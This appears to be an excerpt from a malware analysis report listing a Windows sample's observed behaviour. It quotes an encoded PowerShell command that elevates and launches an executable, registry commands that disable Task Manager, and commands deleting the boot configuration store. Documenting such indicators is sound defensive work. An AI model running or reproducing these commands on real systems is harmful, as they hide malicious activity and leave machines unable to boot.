Technical Information
- Windows Task Manager (Taskmgr)
- %HOMEPATH%\desktop\logs.txt
- nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABuAHcAdwBiAGIAdwBtAG8AXABpAGwAagB0AG4ALgBlAHgAZQAnACAALQBBAHIAZwB1AG0AZ...
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c reg delete HKLM\BCD00000000 /f
- '<SYSTEM32>\reg.exe' delete HKLM\BCD00000000 /f
- '<Full path to file>' --elevated' (with hidden window)